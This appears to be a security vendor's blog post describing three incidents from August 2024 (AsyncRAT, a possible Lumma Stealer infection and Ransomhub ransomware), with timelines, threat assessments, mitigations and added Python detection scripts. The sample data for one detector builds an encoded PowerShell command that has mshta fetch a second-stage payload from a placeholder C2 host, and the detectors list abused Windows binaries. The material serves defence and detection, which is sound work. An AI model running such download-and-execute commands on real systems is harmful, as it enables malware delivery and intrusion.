Between August 14-21, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 85 total incidents throughout our monitored on-premises, Microsoft 365, and Google Workspace environments, with confirmed or likely threat actor use of:
- AsyncRAT for persistence;
- Information stealing malware for credential access and exfiltration; and
- Ransomhub Ransomware for encryption.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
AsyncRAT Incident with Healthcare Partner on August 15, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
  - AsyncRAT
  - aspnet_compiler.exe
  - .zip initial file that contained a .wsf file
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use AsyncRAT to exploit other Healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Employee security training
  - Heuristics-based activity monitoring and remediation
  - Password managers
  - Scripting language controls
AsyncRAT Incident Timeline for 2024-08-15
- Blackpoint’s MDR+R technology alerted to suspicious PowerShell activity on a host of a Healthcare partner.
- Initial investigation by the Active SOC found that the malicious activity originated from the execution of a .zip file that contained a Windows Script File (.wsf), which then pulled down an .htm file.
- Further analysis determined that the .html file called out to and pulled data from two malicious .xml files.
- These .xml files created a scheduled task “TvMusic”, which executed a malicious .vbs file.
- The .vbs file read the text contents of other malicious files, and then executed the contents into the affected device’s memory.
- Additional investigation of the impacted device identified another malicious executable (“aspnet_compiler.exe”) calling out to a Windows command and control (C2) server, apparently based out of England.
- Active SOC analysts isolated the impacted device to prevent any additional malicious activity, before reaching out to the Healthcare partner with additional details and remediation advice.
More About AsyncRAT
AsyncRAT is an open-source remote access tool that was published on GitHub and has been adopted by several threat groups. The malware is capable of multiple actions (1), including:
- Capturing keystrokes on a victim’s machine;
- Examining currently running processes, to determine if a debugger is present on the targeted device;
- Creating scheduled tasks that maintain persistence on infected devices; and
- Recording screen content on infected devices.
AsyncRAT has been used by multiple threat groups and, therefore, post-incident attribution can be difficult. It is likely that AsyncRAT is deployed by threat actors of all skill levels, including APT groups (2) and ransomware operations (3).
APG Threat Analysis of AsyncRAT for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will very likely continue to use AsyncRAT over the next 12 months.
We base this assessment on internal Blackpoint observed incidents, such as this July 22nd incident against a Legal Services partner (4).
The APG’s assessment is augmented by external incident reports that detail the use of AsyncRAT to gain persistence, steal sensitive information, and deploy second stage payloads. For example:
- In August 2024, ConnectWise security researchers reported that AsyncRAT was the third-most common malware observed by the company in July 2024 (5).
- Also in August 2024, ReliaQuest security researchers reported that AsyncRAT remains one of their top malware variants observed in incidents (6).
The continued use of AsyncRAT to collect information, gain persistence, and deploy second-stage malware highlights threat actors’ determination to keep using the tool; it is likely that threat actors will continue to update and improve the tool’s capabilities over the next 12 months.
Recommended AsyncRAT Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations for threat actor use of AsyncRAT in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  - Consider a refresher for your employees on the specific types of malicious files seen downloaded in this incident, including:
    - .zip attachments
    - .wsf attachments
    - .html attachments
    - .xslm attachments
    - .pdf attachments
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
  - Anomalous scheduled tasks and files stored in seemingly incongruous folders, such as a music folder, can be detected with behavior-based alerting methods – as we saw with this incident.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make it more difficult for threat actors to retrieve passwords from compromised accounts.
  - In this incident, the AsyncRAT malware variant can record keystrokes, which in turn can be used to steal passwords that enable additional malicious activities. Using secure password managers can help prevent credentials from being stolen and accounts from being accessed by malicious threat actors.
- Minimize the use of – or implement strict controls on – scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
  - Threat actors often deploy scripts in a targeted environment to conduct malicious activity, such as the Visual Basic file in this incident that was used to read the text contents of another file and execute commands in memory.
  - Restricting the ability to conduct this type of activity can help limit a threat actor’s ability to complete an attack.
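The timeline above (a scheduled task named “TvMusic” launching a .vbs file) and the monitoring recommendation (anomalous tasks pointing at incongruous folders) describe one detectable pattern. As an added illustration that is not Blackpoint’s own tooling, the following triage logic inspects Windows Security Event ID 4698 (“a scheduled task was created”) records, parses the embedded task XML, and flags actions where a script host runs a script out of a user-writable or out-of-place folder. The sample events, paths and folder list are constructed assumptions; only the task name mirrors the incident.

```python
"""Triage Windows 4698 'scheduled task created' events for the pattern seen in the
AsyncRAT chain: a script host launching a script that lives in an incongruous,
user-writable folder (the Music folder, Downloads, Temp, Public, ProgramData)."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|wsf|js|jse|hta|ps1|bat|cmd)\b", re.IGNORECASE)
# Heuristic list of folders where a scheduled task's script or binary has no business living.
SUSPICIOUS_DIRS = ("\\music\\", "\\downloads\\", "\\appdata\\local\\temp\\",
                   "\\users\\public\\", "\\programdata\\")

def parse_actions(task_xml):
    """Return (command, arguments) pairs from the task definition's <Exec> actions."""
    root = ET.fromstring(task_xml)
    return [(node.findtext("t:Command", "", TASK_NS).strip(),
             node.findtext("t:Arguments", "", TASK_NS).strip())
            for node in root.findall(".//t:Actions/t:Exec", TASK_NS)]

def in_suspicious_dir(path):
    p = path.lower().replace("/", "\\")
    return any(d in p for d in SUSPICIOUS_DIRS)

def assess_task(event):
    """Return reasons the task looks malicious; an empty list means nothing matched."""
    reasons = []
    for cmd, args in parse_actions(event["TaskContent"]):
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS and SCRIPT_EXT.search(args):
            reasons.append(f"script host {exe} runs a script: {args}")
        if in_suspicious_dir(cmd) or in_suspicious_dir(args):
            reasons.append(f"action lives in a user-writable/incongruous folder: {cmd} {args}".rstrip())
    return reasons

def triage(events):
    """Map task name -> reasons for every event that raised at least one reason."""
    hits = {}
    for event in events:
        reasons = assess_task(event)
        if reasons:
            hits[event["TaskName"]] = reasons
    return hits

def task_xml(command, arguments):
    """Build a minimal task definition; used only to construct the sample events below."""
    return (f'<Task version="1.2" xmlns="{TASK_NS["t"]}"><Actions Context="Author">'
            f"<Exec><Command>{command}</Command><Arguments>{arguments}</Arguments></Exec>"
            "</Actions></Task>")

# Constructed 4698-style records; the task name mirrors the incident, the paths do not.
SAMPLE_EVENTS = [
    {"TaskName": "\\TvMusic",
     "TaskContent": task_xml("wscript.exe", "C:\\Users\\jdoe\\Music\\TvMusic.vbs")},
    {"TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": task_xml("%windir%\\system32\\defrag.exe", "-c -h -o -$")},
    {"TaskName": "\\Updater",
     "TaskContent": task_xml("C:\\Users\\Public\\svc.exe", "")},
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

The folder list is a heuristic to tune per environment; the point is to alert on where the task’s action lives and what runs it, not on the task name.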
Possible Lumma Infostealer Incident with Industrials Partner on August 15, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
  - Native Windows binary mshta.exe
  - Infostealer malware, possibly Lumma Stealer
  - RDP
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use infostealers such as Lumma Stealer to exploit other Industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Employee security training
  - Dedicated software center
  - Least-privilege access controls
  - Heuristics-based activity monitoring and remediation
Possible Lumma Stealer Malware Incident Timeline for 2024-08-15
- Blackpoint’s MDR+R technology alerted to the execution of a malicious obfuscated PowerShell command on the host of an Industrials partner.
- Initial investigation by the Active SOC identified the threat actor’s payload as an information stealing malware.
- The infected user was likely tricked into opening a malicious file, which then triggered the download and installation of the malware onto the endpoint.
- Additional analysis determined that the malicious file/document triggered the execution of an encoded PowerShell command, which initially tripped the MDR+R alert for analysis.
- The encoded PowerShell command would use the native Windows binary, mshta.exe, to reach out and download a second-stage payload from an external C2 server.
- The hash associated with the second-stage payload has been associated with the Lumma Stealer malware family (7).
- The malicious PowerShell script also downloaded another executable, used for network traffic capturing.
- Once the second-stage payload completed download, it triggered the execution of the obfuscated PowerShell command. Analysts determined this command would likely be responsible for establishing persistence and executing other functions of the information stealing malware.
- Active SOC analysts isolated the affected devices and deleted the scheduled tasks to prevent further malicious activity, before then reaching out to the Industrials partner to provide information about the incident and to provide mitigation advice.
More About Lumma Stealer and Other Infostealer Malware
Lumma Stealer is a malware-as-a-service (MaaS) that has been advertised on cybercriminal forums since at least 2022. Lumma Stealer is capable of targeting (8):
- Cryptocurrency wallets,
- Browser extensions,
- MFA instances, and
- Other sensitive data from the compromised system.
Information stealers such as Lumma Stealer are an attractive malware choice for threat groups, due to their ability to use and / or exfiltrate gathered information for profitable gain.
As infostealers in general – and Lumma Stealer specifically – are offered on multiple cybercriminal forums and therefore used by multiple threat actors, post-incident attribution as to which group used this malware in this incident is more difficult.
APG Threat Analysis of Lumma Stealer and Other Infostealer Malware for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use infostealer malware such as Lumma Stealer over the next 12 months.
The APG’s assessment is based on external incident reports detailing the deployment of the Lumma Stealer malware. For example:
- In May 2024, eSentire security researchers reported an incident where a threat actor used fake update instances to deliver malware, including Lumma Stealer (9).
  - The victim user visited an infected webpage that contained malicious JavaScript code.
  - The code then directed the victim to the fake update page, which included a download link to a ZIP archive that automatically downloaded onto the victim’s device.
  - The final payload was reportedly BitRAT and/or Lumma Stealer.
- In July 2024, CrowdStrike security researchers reported a phishing domain that impersonated CrowdStrike and delivered malicious ZIP and RAR files containing a Microsoft Installer (MSI) loader (10).
  - The loader then reportedly executed Lumma Stealer packed with CypherIt.
Recommended Lumma Stealer and Other Infostealer Malware Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations for threat actor use of infostealer malware – including Lumma Stealer – in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  - Analysis of the incident observed this week indicated that the initial access vector was a downloaded file, which may have been avoided with regular and effective end user security training.
- Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location, so they don’t “go rogue” and accidentally download malware from a malvertising or SEO-poisoned instance.
  - Threat actors have previously delivered malware, such as the information stealer in this incident, via fake updates and social engineering campaigns that lead victims to malicious websites. A software center offering the legitimate version of the software that the lure impersonated might have prevented this incident altogether.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desirable targets.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
  - Behavior-based techniques can help identify when a legitimate Windows utility, such as mshta.exe in this incident, is used in a manner that is abnormal within a victim network. Understanding where and why a Windows utility is needed provides the context to determine when it is being used by threat actors.
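The timeline for this incident (an encoded PowerShell command that uses mshta.exe to fetch a second stage) and the behavior-based detection point above come together in the following added example, which is not Blackpoint’s code. It takes process-creation records, decodes any -EncodedCommand argument (PowerShell accepts any unambiguous prefix such as -e or -enc), and flags the hand-off from PowerShell to a native binary that reaches for a remote URL. The sample records, the image paths and the placeholder URL are constructed assumptions, not artifacts from the incident.

```python
"""Flag process-creation events in which PowerShell, possibly via an encoded command,
hands off to a native Windows binary such as mshta.exe to fetch remote content."""
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
LOLBINS = {"mshta.exe", "certutil.exe", "bitsadmin.exe", "regsvr32.exe", "rundll32.exe"}
LOLBIN_RE = re.compile(r"\b(mshta|certutil|bitsadmin|regsvr32|rundll32)(?:\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments together."""
    return re.findall(r'"[^"]*"|\S+', cmdline)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand (any prefix: -e, -enc, ...),
    or None when the switch is absent or the blob is truncated / not valid base64."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-1]):
        name = tok.lower().lstrip("-/")
        if tok[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(toks[i + 1].strip('"'), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def assess_process(image, cmdline):
    """Return reasons the event matches the encoded PowerShell -> LOLBin -> download pattern."""
    reasons = []
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    text = cmdline
    if exe in POWERSHELL:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("encoded PowerShell command decoded: " + decoded[:60])
            text += " " + decoded          # inspect the decoded script as well as the raw line
    match = LOLBIN_RE.search(text)
    lolbin = exe[:-4] if exe in LOLBINS else (match.group(1).lower() if match else None)
    urls = URL_RE.findall(text)
    if lolbin and urls:
        reasons.append(f"{lolbin} used to fetch remote content: {urls[0]}")
    elif lolbin and exe in POWERSHELL:
        reasons.append(f"PowerShell hands off to native binary {lolbin}")
    return reasons

def _enc(script):
    """Base64/UTF-16LE encoder used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed Sysmon Event ID 1-style records; the URL is a placeholder, not an incident IoC.
SAMPLE_EVENTS = [
    {"Image": PS_IMAGE, "CommandLine": "powershell.exe -nop -w hidden -enc "
                                       + _enc("mshta http://c2.example.invalid/stage2.hta")},
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": 'mshta.exe "C:\\Program Files\\Vendor\\help.hta"'},
    {"Image": PS_IMAGE, "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"Image": PS_IMAGE, "CommandLine": "powershell.exe -enc not-base64!!"},
]

def triage(events):
    """Map event index -> reasons for every event that raised at least one reason."""
    return {i: r for i, e in enumerate(events) if (r := assess_process(e["Image"], e["CommandLine"]))}
```

A local .hta opened by mshta.exe (the second record) raises nothing on its own, which is the “where and why a utility is needed” context the recommendation describes.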
Ransomhub Ransomware Incident with Onboarding Legal Services Partner on August 16, 2024
Topline Takeaways
- Industry target: Legal Services
- Attacker information:
  - Ransomhub Ransomware
  - Custom ScreenConnect tool
  - netscan
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
  - The Adversary Pursuit Group (APG) predicts that it is almost certain that threat actors will continue to use Ransomhub Ransomware to exploit other Legal Services organizations over the next 12 months.
- Recommended remediations and mitigations:
  - Heuristics-based activity monitoring and remediation
  - Proper firewall and VPN configurations
  - Multifactor authentication (MFA)
  - Create and maintain data backups
Onboarding Ransomhub Ransomware Incident Timeline for 2024-08-16
- While Blackpoint’s Active SOC onboarded a new Legal Services partner, Blackpoint’s MDR+R technology alerted to several detections flagging suspicious activity.
- Initial investigation by the Active SOC revealed a Ransomhub operator abusing and monitoring the partner’s SSL VPN for malicious purposes, with likely initial access due to an LDAP misconfiguration.
- The threat actor-operator gained access to a user account on the network and likely extracted several hashes, cracking them offline.
- The threat actor then logged in to another user account, and abused a LOLDriver technique to deploy their payload.
- Additional threat actor observation by Active SOC analysts found that the threat actor used their own custom ScreenConnect instance for persistence.
- Active SOC analysts contacted the Legal Services partner to discuss the alerts, confirming Ransomhub ransomware targeting with the partner before isolating all impacted devices and recommending additional remediation activities for immediate deployment to prevent further compromise.
More About Ransomhub Ransomware
Ransomhub ransomware is a ransomware-as-a-service (RaaS) operation that has been active since at least February 2024, with the operators reportedly taking a 10% commission from affiliates after successful ransom attempts.
Ransomhub is written in Golang and C++, according to an advertisement on a dark-web forum. Its encryptor’s asymmetric algorithm is based on x25519, paired with AES256, ChaCha20, and XChaCha20 for symmetric encryption (11).
Data leak site tracking by Blackpoint’s Adversary Pursuit Group (APG) found that since February 2024, Ransomhub operators have listed 188 victims, with the majority of victims based out of North America (77) and in the Construction & Engineering (17) and Manufacturing (17) verticals.
However, Ransomhub ransomware has likely impacted more victims than those listed by its primary operators, as the data leak site does not include victims that may have paid the ransom or are otherwise omitted for other reasons known only to the criminals themselves.
APG Threat Analysis of Ransomhub Ransomware for 2024
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will almost certainly continue to use Ransomhub ransomware over the next 12 months.
We base this assessment on the APG’s tracking of data leak sites, as reported previously, as well as external incident reports detailing Ransomhub ransomware deployment. For example:
- In August 2024, Sophos security researchers reported that the Ransomhub operators were observed using an EDR-killing tool dubbed EDRKillShifter (12).
  - The researchers reported an attempted Ransomhub incident that occurred in May 2024, during which threat actors tried to use EDRKillShifter to evade detection.
  - The identification of a newly observed tool indicates that the Ransomhub ransomware operators are likely determined and sophisticated threat actors invested in enhancing their current malware and ransomware packages, rather than creating net-new code.
- In June 2024, Symantec security researchers reported that the Ransomhub operation is likely related to the Knight ransomware operation (13).
  - Knight operators purportedly sold their encryptor.
  - Subsequent analysis of the Ransomhub ransomware variant has led security researchers to believe that Ransomhub was likely created by a skilled and sophisticated threat actor updating the Knight encryptor for their own ransomware outfit.
Recommended Ransomhub Ransomware Mitigations and Remediations
Blackpoint’s APG recommends the following remediations and mitigations for threat actor use of Ransomhub Ransomware in your environment.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
  - Behavior-based triggers and alerts can help identify threat actor actions, such as the netscan execution and lateral movement activities seen during this incident, thereby stopping an incident prior to network encryption.
- Establish effective VPN and firewall rules and configurations, including restricting access to port 3389, blocking RDP traffic between network security zones, and enforcing proper LDAP configurations.
  - VPNs that are configured incorrectly, such as using misconfigured LDAP (which sends traffic in cleartext), can allow threat actors to access credentials for later log-ins to legitimate accounts – as we saw during this incident analysis.
  - Additionally, publicly exposed VPN instances allow threat actors to further abuse the configuration, accessing user accounts and moving laterally through an environment’s network – again, as we saw attempted during this incident.
- Enforce multi-factor authentication (MFA) on all user accounts – especially those with privileged access! – to help decrease the chances of undetected credential compromise.
  - If threat actors are able to gain access to hashes or cleartext credentials, as they did during this incident, having MFA enabled provides an additional level of authentication to protect user accounts.
- Create and maintain data backups, including offline backups that are kept separate from the network and system. Should your system suffer a lockout from a ransomware attempt, your uncorrupted and easily reinstated data backups become a key part of your business continuity plan to resume regular operations.
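Before LDAP signing or LDAPS can be enforced for the VPN and other clients, you need to know which accounts are still binding in cleartext. As an added example that is not Blackpoint’s tooling, the script below audits Directory Service Event ID 2889 messages (a domain controller logs one for each simple bind over cleartext or SASL bind without signing) and groups them by account and client, calling out clients inside the VPN address pool and service or admin accounts. The message layout is modelled on the real event but constructed here; the VPN pool, account naming hints and sample records are assumptions.

```python
"""Find accounts and clients still authenticating to a domain controller with simple
LDAP binds over cleartext or unsigned SASL binds, from Directory Service Event ID 2889
messages, so they can be fixed before LDAP signing / LDAPS are enforced."""
import ipaddress
import re
from collections import defaultdict

# Message layout modelled on Event 2889 (constructed here; IPv4 clients only).
FIELD_RE = re.compile(
    r"Client IP address:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+).*?"
    r"Identity the client attempted to authenticate as:\s*(?P<identity>\S+).*?"
    r"Binding Type:\s*(?P<btype>\d)", re.DOTALL)
BIND_KIND = {"0": "simple bind over cleartext LDAP", "1": "SASL bind without signing"}
VPN_POOL = ipaddress.ip_network("10.200.0.0/16")   # assumed SSL VPN client address pool
PRIVILEGED_HINTS = ("admin", "svc_")              # assumed account naming convention

def parse_2889(message):
    """Extract client IP, identity and bind kind; None if the text is not a 2889 event."""
    m = FIELD_RE.search(message)
    if m is None:
        return None
    return {"ip": ipaddress.ip_address(m["ip"]), "identity": m["identity"],
            "kind": BIND_KIND.get(m["btype"], "unknown")}

def audit(messages):
    """Aggregate insecure binds per (identity, client) and attach risk context."""
    counts = defaultdict(int)
    kinds = {}
    for message in messages:
        rec = parse_2889(message)
        if rec is None:
            continue                      # unrelated Directory Service events are skipped
        key = (rec["identity"], str(rec["ip"]))
        counts[key] += 1
        kinds[key] = rec["kind"]
    findings = []
    for (identity, client), n in sorted(counts.items()):
        risk = []
        if ipaddress.ip_address(client) in VPN_POOL:
            risk.append("client is in the VPN pool: the credential crossed the VPN-facing path in cleartext")
        if any(h in identity.lower() for h in PRIVILEGED_HINTS):
            risk.append("privileged or service account")
        findings.append({"identity": identity, "client": client, "count": n,
                         "kind": kinds[(identity, client)], "risk": risk})
    return findings

def _msg(ip, port, identity, btype):
    """Build a 2889-style message; used only to construct the sample records below."""
    return (f"The following client performed an insecure LDAP bind. Client IP address: {ip}:{port} "
            f"Identity the client attempted to authenticate as: {identity} Binding Type: {btype}")

# Constructed sample events; addresses and account names are placeholders.
SAMPLE_MESSAGES = [
    _msg("10.200.4.17", 51022, "CORP\\svc_vpn", 0),
    _msg("10.200.4.17", 51040, "CORP\\svc_vpn", 0),
    _msg("10.10.5.8", 49812, "CORP\\jdoe", 1),
    "The LDAP interface is now listening on port 636.",   # unrelated event, must be ignored
]

if __name__ == "__main__":
    for f in audit(SAMPLE_MESSAGES):
        print(f["identity"], f["client"], f["count"], f["kind"], f["risk"])
```

Binding Type 0 is the case the recommendation warns about: the bind carried a password in cleartext, so the account is the first place to look for credential exposure.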
References and Resources
A quick note on incident details:
As these analyses concern recent incidents in actively monitored environments, certain details may occasionally be omitted and / or obfuscated to better secure our partners and protect any still-ongoing investigations.
However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident!
- MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
- Trend Micro’s Blog: “New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware” by Daniel Lunghi; Jaromir Horejsi on 2022-04-27
- Cyberint’s Blog: “Credentials And Control Go Bye, Bye, Bye with AsyncRAT: What You Need to Know” by Adi Bleih on 2024-05-05
- Blackpoint Cyber’s Blog: “SYS01 Stealer, Ratty RAT, and AsyncRAT” by Blackpoint Cyber on 2024-07-26
- ConnectWise’s Blog: “Monthly Threat Brief: July 2024” by Bryson Medlock on 2024-08-19
- ReliaQuest’s Blog: “5 Malware Variants You Should Know” by Hayden Evans on 2024-08-15
- VirusTotal’s Repository: “f734e1c89a5f9279e6f45ca6fcc85d4ae231995715b11203b0e31f4fcd2bc150” by VirusTotal on 2024-08-18
- DarkTrace’s Blog: “The Rise of the Lumma Info-Stealer | Malware-as-a-Service” by Emily Megan Lim on 2023-09-06
- eSentire’s Blog: “Fake Browser Updates delivering BitRAT and Lumma Stealer” by eSentire Threat Response Unit on 2024-05-29
- CrowdStrike’s Blog: “Lumma Stealer Packed with CypherIt Distributed Using Falcon Sensor Update Phishing Lure” by Counter Adversary Operations on 2024-07-24
- Forescout’s Blog: “Analysis: A new ransomware group emerges from the Change Healthcare cyber attack” by Forescout Research – Vedere Labs on 2024-05-09
- Sophos’s Blog: “Ransomware attackers introduce new EDR killer to their arsenal” by Andreas Klopsch on 2024-08-14
- Symantec’s Blog: “RansomHub: New Ransomware has Origins in Older Knight” by Threat Hunter Team on 2024-06-05